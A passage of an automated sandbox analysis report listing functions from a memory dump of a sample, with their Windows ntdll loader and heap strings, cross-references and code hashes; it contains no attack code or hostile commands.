                                        • LdrpInitShimEngine, xrefs: 014299F4, 01429A07, 01429A30
                                        • minkernel\ntdll\ldrinit.c, xrefs: 01429A11, 01429A3A
                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 014299ED
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                        • API String ID: 0-204845295
                                        • Opcode ID: e3fb68e9c814371cb4dcf3082878b3bc9d18c0419846c42d6e88303d795a3e2e
                                        • Instruction ID: e74629c8b0b93ab408306dd6d2dbc7e5687c94f8996e71c41b5f75c1aabef317
                                        • Opcode Fuzzy Hash: e3fb68e9c814371cb4dcf3082878b3bc9d18c0419846c42d6e88303d795a3e2e
                                        • Instruction Fuzzy Hash: 1451D1712083559FE720DF28D886BAB77E8FB94B48F40491EF58597260EA30ED44CB92
                                        Function 01402674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                        Download Yara Rule
                                        Strings
                                        • RtlGetAssemblyStorageRoot, xrefs: 01442160, 0144219A, 014421BA
                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 014421BF
                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01442180
                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01442178
                                        • SXS: %s() passed the empty activation context, xrefs: 01442165
                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0144219F
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                        • API String ID: 0-861424205
                                        • Opcode ID: 43f6dbda4f14fe3a39716f5d7ab33cd94fe9413d19ddfc6e0867100b65df7385
                                        • Instruction ID: 2eda25daf968d4f756705cdddad1bb01be90eff079a81bb70d5540ba2a8861f7
                                        • Opcode Fuzzy Hash: 43f6dbda4f14fe3a39716f5d7ab33cd94fe9413d19ddfc6e0867100b65df7385
                                        • Instruction Fuzzy Hash: 5E310B36B4021577F7128A979C85F9B7B68DBA4A94F05006FFB05B73E1E2F09A01C7A1
                                        Function 0140C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                        Download Yara Rule
                                        Strings
                                        • LdrpInitializeImportRedirection, xrefs: 01448177, 014481EB
                                        • Loading import redirection DLL: '%wZ', xrefs: 01448170
                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01448181, 014481F5
                                        • LdrpInitializeProcess, xrefs: 0140C6C4
                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 014481E5
                                        • minkernel\ntdll\ldrinit.c, xrefs: 0140C6C3
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                        • API String ID: 0-475462383
                                        • Opcode ID: 1adf34ac11eff57e2c0c5748ff3d2a99d21259c554bf132f39f7fa9bebdd8168
                                        • Instruction ID: 20a7b8e6ed9f9722cf94b9ff0f304d49901bf83d277fda14b0086ded0b40639b
                                        • Opcode Fuzzy Hash: 1adf34ac11eff57e2c0c5748ff3d2a99d21259c554bf132f39f7fa9bebdd8168
                                        • Instruction Fuzzy Hash: B83104716443069FD220EF6ADD86E1B7795FFA0B14F05056EF9446B3A1E630EC04C7A2
                                        Function 0141096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 01412DF0: LdrInitializeThunk.NTDLL ref: 01412DFA
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01410BA3
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01410BB6
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01410D60
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01410D74
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                        • String ID:
                                        • API String ID: 1404860816-0
                                        • Opcode ID: 02b248f7292e5975127718018df654a8a7253cd171de4c0da4061269b8e31a9a
                                        • Instruction ID: 68aed13a10348ed8ca799c73fcb116ea22fe1ecfca0b3364dcfca8d45bb28fbc
                                        • Opcode Fuzzy Hash: 02b248f7292e5975127718018df654a8a7253cd171de4c0da4061269b8e31a9a
                                        • Instruction Fuzzy Hash: DF425C75900715DFEB21CF28C840BAAB7F5BF08314F1485AAE989EB355D770A985CF60
                                        Function 013DA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                        • API String ID: 0-379654539
                                        • Opcode ID: ec0da0f6c6ff8f967efb078b039f55999c65b8f5fa433311e21f10d625fc06c7
                                        • Instruction ID: 75daf2af87d6ed034b0a823fb065e4a76fc74d46240c3b918dd8826212213561
                                        • Opcode Fuzzy Hash: ec0da0f6c6ff8f967efb078b039f55999c65b8f5fa433311e21f10d625fc06c7
                                        • Instruction Fuzzy Hash: B5C1AB72108386CFD711CF58D244B6ABBF4BF88708F00886AF9959B761E774CA49CB52
                                        Function 01408402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                        Download Yara Rule
                                        Strings
                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0140855E
                                        • LdrpInitializeProcess, xrefs: 01408422
                                        • minkernel\ntdll\ldrinit.c, xrefs: 01408421
                                        • @, xrefs: 01408591
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                        • API String ID: 0-1918872054
                                        • Opcode ID: 99c707eff6d29b6ab5c2b3e3112de7c7347494e323ea08cc94b106f46d27723d
                                        • Instruction ID: 11d027f14114dd09efc514b53923982e9829929de29c9e34dd8e9f13735a3d16
                                        • Opcode Fuzzy Hash: 99c707eff6d29b6ab5c2b3e3112de7c7347494e323ea08cc94b106f46d27723d
                                        • Instruction Fuzzy Hash: 8F918F71908346AFE722DF66C941FABBAE8FB94644F40093FF684961A1E374D904CB52
                                        Function 0140273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                        Download Yara Rule
                                        Strings
                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 014421D9, 014422B1
                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 014422B6
                                        • .Local, xrefs: 014028D8
                                        • SXS: %s() passed the empty activation context, xrefs: 014421DE
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                        • API String ID: 0-1239276146
                                        • Opcode ID: d933721412ef5c7b7a1733595a8789bb2ea4011db37e1bf33cf416ea4d2362e1
                                        • Instruction ID: 6239d463c9fdc5a82d437e1096733db67ab078ffe021cb1d2553b0a41ab8ae3c
                                        • Opcode Fuzzy Hash: d933721412ef5c7b7a1733595a8789bb2ea4011db37e1bf33cf416ea4d2362e1
                                        • Instruction Fuzzy Hash: FDA1B535A002299BDB25CF59D888F9AB7B4BF54354F1501FAE908A73E1D7709E81CF90
                                        Function 01404AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                        Download Yara Rule
                                        Strings
                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01443456
                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0144342A
                                        • RtlDeactivateActivationContext, xrefs: 01443425, 01443432, 01443451
                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01443437
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                        • API String ID: 0-1245972979
                                        • Opcode ID: bb0aca39dcbd52f2c6901a307793dea31932e2a9c889d2be9c0a5c2d410a5a61
                                        • Instruction ID: 6818e4325079001985eda4d49114ff29b96a40506ebf47e5f7fd71c061009b6d
                                        • Opcode Fuzzy Hash: bb0aca39dcbd52f2c6901a307793dea31932e2a9c889d2be9c0a5c2d410a5a61
                                        • Instruction Fuzzy Hash: FF6116326047129BE723CF1EC841B6BB7E0AF90B50F19453EEA559B7A1D730E841CB91
                                        Function 013D64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                        Download Yara Rule
                                        Strings
                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01430FE5
                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 014310AE
                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0143106B
                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01431028
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                        • API String ID: 0-1468400865
                                        • Opcode ID: e92cc7863a3913fcf951d2cecf083768ffc4247ce880a368dd244ed3988baff0
                                        • Instruction ID: 26db9f3cd9574c2bd47c922d6f96f53e4dad9827cc4f97f7108138693fd386d5
                                        • Opcode Fuzzy Hash: e92cc7863a3913fcf951d2cecf083768ffc4247ce880a368dd244ed3988baff0
                                        • Instruction Fuzzy Hash: DE71E1B2904305DFCB21DF19D885B9B7FA9AFA4768F40046EF9488B256D334D588CBD2
                                        Function 013F245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                        Download Yara Rule
                                        Strings
                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0143A992
                                        • apphelp.dll, xrefs: 013F2462
                                        • LdrpDynamicShimModule, xrefs: 0143A998
                                        • minkernel\ntdll\ldrinit.c, xrefs: 0143A9A2
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                        • API String ID: 0-176724104
                                        • Opcode ID: c67b3f07e75505e2f8de2f11a1833da3d49c6eb721a9303cc28ac42e5953fbab
                                        • Instruction ID: a15ed1e6c932263416e7b98e29f658905824a525de090d04c58004fa66762d5d
                                        • Opcode Fuzzy Hash: c67b3f07e75505e2f8de2f11a1833da3d49c6eb721a9303cc28ac42e5953fbab
                                        • Instruction Fuzzy Hash: D2311576640201EFDB219F5D9885AAB7BB4FBC8B08F26805EE941B7375C7B09842C790
                                        Function 013E29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                        Download Yara Rule
                                        Strings
                                        • HEAP[%wZ]: , xrefs: 013E3255
                                        • HEAP: , xrefs: 013E3264
                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 013E327D
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                        • API String ID: 0-617086771
                                        • Opcode ID: 5603700fce99d451f08fdf362d16632ab1c4d245efd7d05305d57dcfdc9b9a78
                                        • Instruction ID: 13c245520d4af2cd0d0c0e33418b17b61a0a8b5cec8ecd0601a5aa69183473f1
                                        • Opcode Fuzzy Hash: 5603700fce99d451f08fdf362d16632ab1c4d245efd7d05305d57dcfdc9b9a78
                                        • Instruction Fuzzy Hash: 2692CC31A043699FDB25CF68C448BAEBBF5FF48318F188059E84AAB791D734A945CF50
                                        Function 013E0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                        • API String ID: 0-4253913091
                                        • Opcode ID: 7df38279171880fa2a81072d392f81578c9fd861994a6a4cb3fce4f522c880bd
                                        • Instruction ID: 89ea79a232c586b16b969dac7adb90e9caf99ff1a3072ce5276a4fc7f5fe4e01
                                        • Opcode Fuzzy Hash: 7df38279171880fa2a81072d392f81578c9fd861994a6a4cb3fce4f522c880bd
                                        • Instruction Fuzzy Hash: 7AF18D70B00616DFEB29CF68C898B6ABBF5FB84308F144169E4569B7A1D770A941CF90
                                        Function 013F6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $@
                                        • API String ID: 0-1077428164
                                        • Opcode ID: 376e2cb36f2b41f2c70d98595b9612578bbd9a1135b870e360289fac69a902b8
                                        • Instruction ID: eab5f56ea62cf6366b06ca650713bd65bad0a4ca50583079339c098cf81b3535
                                        • Opcode Fuzzy Hash: 376e2cb36f2b41f2c70d98595b9612578bbd9a1135b870e360289fac69a902b8
                                        • Instruction Fuzzy Hash: B6C292716083459FDB25CF28C881BABBBE5AFC8758F04892EFA89D7251D734D805CB52
                                        Function 013CA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: FilterFullPath$UseFilter$\??\
                                        • API String ID: 0-2779062949
                                        • Opcode ID: ebafd287acee9f738076947d060757641ebddc12d30be6a39753e6518fe95e5b
                                        • Instruction ID: dc6dbd0de4ec8c445b8f00d5a919a170f7e91820a7c77b3bdf6b4273dfc86c0e
                                        • Opcode Fuzzy Hash: ebafd287acee9f738076947d060757641ebddc12d30be6a39753e6518fe95e5b
                                        • Instruction Fuzzy Hash: 2EA14D719016399BDB319F68CC88BAEB7B8EF44714F5001EAE909A7260E7359EC5CF50
                                        Function 013F0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                        Download Yara Rule
                                        Strings
                                        • LdrpCheckModule, xrefs: 0143A117
                                        • Failed to allocated memory for shimmed module list, xrefs: 0143A10F
                                        • minkernel\ntdll\ldrinit.c, xrefs: 0143A121
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                        • API String ID: 0-161242083
                                        • Opcode ID: 7c2e2493cad4e1ef6a644f08f63a02d9d1b4177e0717e1b5d528d93358088b52
                                        • Instruction ID: b2907ac78a9d7c64a4bd7a730c6a1f5018e6fee082121b6a71e14f0e7903c41b
                                        • Opcode Fuzzy Hash: 7c2e2493cad4e1ef6a644f08f63a02d9d1b4177e0717e1b5d528d93358088b52
                                        • Instruction Fuzzy Hash: C371D171A002059FDF29DF6CC980BAEB7F5EB88608F15802EE542DB365D734AD41CB50
                                        Function 013E0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                        • API String ID: 0-1334570610
                                        • Opcode ID: 084f1b8cb1ee62dd0315429496f1c1d4ff97967fa8bdc988ec9634185608a399
                                        • Instruction ID: 115b64a6c0f3798f7b627660cc939b81752d11e562b274a5a7ff22dce0f0f4eb
                                        • Opcode Fuzzy Hash: 084f1b8cb1ee62dd0315429496f1c1d4ff97967fa8bdc988ec9634185608a399
                                        • Instruction Fuzzy Hash: AB619D707003169FDB29CF28C484B6ABBE5FF44708F14856EE4999F696D7B0E881CB91
                                        Function 0140C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                        Download Yara Rule
                                        Strings
                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 014482DE
                                        • minkernel\ntdll\ldrinit.c, xrefs: 014482E8
                                        • Failed to reallocate the system dirs string !, xrefs: 014482D7
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                        • API String ID: 0-1783798831
                                        • Opcode ID: b9332183143ec80f3fe6aa16fd7c15a38e59d6619c1c43a79dfe7e226fca5f7a
                                        • Instruction ID: 5c12aefe2628b0708295d0d07169a9fb24792160e2685e638dfca6b124b8b439
                                        • Opcode Fuzzy Hash: b9332183143ec80f3fe6aa16fd7c15a38e59d6619c1c43a79dfe7e226fca5f7a
                                        • Instruction Fuzzy Hash: 6141C171640312EFD722EB69D884B5B77E8EF54B58F014A2BF948933B0EB70D8008B91
                                        Function 0148C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                        Download Yara Rule
                                        Strings
                                        • PreferredUILanguages, xrefs: 0148C212
                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0148C1C5
                                        • @, xrefs: 0148C1F1
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                        • API String ID: 0-2968386058
                                        • Opcode ID: 59672e74670cf73deb2b45c8b1c3b121d183c8088c917d3996430dfd84b5b928
                                        • Instruction ID: ce01ce3e94612a465c97081a4b05c74e6536cf5836169dd2b744f9962c39ad71
                                        • Opcode Fuzzy Hash: 59672e74670cf73deb2b45c8b1c3b121d183c8088c917d3996430dfd84b5b928
                                        • Instruction Fuzzy Hash: 23417271E00219EBDF11EBD8C881FEEBBB8AB14714F14406BE609A72A0D7749A44CB60
                                        Function 01464144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                        • API String ID: 0-1373925480
                                        • Opcode ID: 7e056e68f84603be4cb01de2020ac5f8f50a09c5b0d1c116fd8cb44afe6d21b2
                                        • Instruction ID: 6bb8cd7c5922262293cc5af3165d9681ac4be66215edcb6b7b1fe6e4d4a07fc8
                                        • Opcode Fuzzy Hash: 7e056e68f84603be4cb01de2020ac5f8f50a09c5b0d1c116fd8cb44afe6d21b2
                                        • Instruction Fuzzy Hash: 8941E471A04358CBEF25DBD9C844BAEBBB8FF55348F28045BD901EB7A1D6358941CB12
                                        Function 01454755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                        Download Yara Rule
                                        Strings
                                        • LdrpCheckRedirection, xrefs: 0145488F
                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01454888
                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01454899
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                        • API String ID: 0-3154609507
                                        • Opcode ID: 3fc9f27b63fda53af4eea5609c954fd84ae5da6097757f3b4c7d956bdded1af0
                                        • Instruction ID: 56a1244b1ef019e2f24c6151df09030f4eeb26d6294be695787e0859e0545736
                                        • Opcode Fuzzy Hash: 3fc9f27b63fda53af4eea5609c954fd84ae5da6097757f3b4c7d956bdded1af0
                                        • Instruction Fuzzy Hash: 2E41B036A042519FCBA1CE69D840A277BE4EF49A54B0A056FED489F373F731D880CB91
                                        Function 013E0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                        • API String ID: 0-2558761708
                                        • Opcode ID: 302dcea477f48c7af6032b027188eb2751369a0c129253554707ed10ca7019f2
                                        • Instruction ID: dfe3cd7d802ea109e0b1b86aee69e170f05e7c5e13972cbda664efe9b17821f4
                                        • Opcode Fuzzy Hash: 302dcea477f48c7af6032b027188eb2751369a0c129253554707ed10ca7019f2
                                        • Instruction Fuzzy Hash: 0D11DF31314212DFDB2DCA18C849B7AB3A8EFA4A1EF18812EF406DF2A1DB70D841C751
                                        Function 014520DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                        Download Yara Rule
                                        Strings
                                        • LdrpInitializationFailure, xrefs: 014520FA
                                        • Process initialization failed with status 0x%08lx, xrefs: 014520F3
                                        • minkernel\ntdll\ldrinit.c, xrefs: 01452104
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                        • API String ID: 0-2986994758
                                        • Opcode ID: 97ce487adba0dc40c08fd5aaa7ed6fc35ca61e2e6faf7d3a43d468907d9be2d1
                                        • Instruction ID: ce6d35e73f01e1738ee10a4a09b4d203cae8480b59d5291a37021fcc67e068ae
                                        • Opcode Fuzzy Hash: 97ce487adba0dc40c08fd5aaa7ed6fc35ca61e2e6faf7d3a43d468907d9be2d1
                                        • Instruction Fuzzy Hash: 8FF0A475640208AFE724DA4DDC46FDB3B68EB50B58F14405AFB047B796D2F0A5008A91
                                        Function 013E03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: ___swprintf_l
                                        • String ID: #%u
                                        • API String ID: 48624451-232158463
                                        • Opcode ID: eaaba63c464a6144ec07100fdbc4b440b6e2c8667b6f182c304bd22297ed0cda
                                        • Instruction ID: be2573b3e5c03692fac5c8dab51cb2e0241eb96f98540c2f267913c5dad968b4
                                        • Opcode Fuzzy Hash: eaaba63c464a6144ec07100fdbc4b440b6e2c8667b6f182c304bd22297ed0cda
                                        • Instruction Fuzzy Hash: 7C716E71A0021A9FDB05DF99C984BAEB7F8FF58704F14406AE905E72A1EA34ED01CB60
                                        Function 013DA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                        Download Yara Rule
                                        Strings
                                        • LdrResSearchResource Exit, xrefs: 013DAA25
                                        • LdrResSearchResource Enter, xrefs: 013DAA13
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
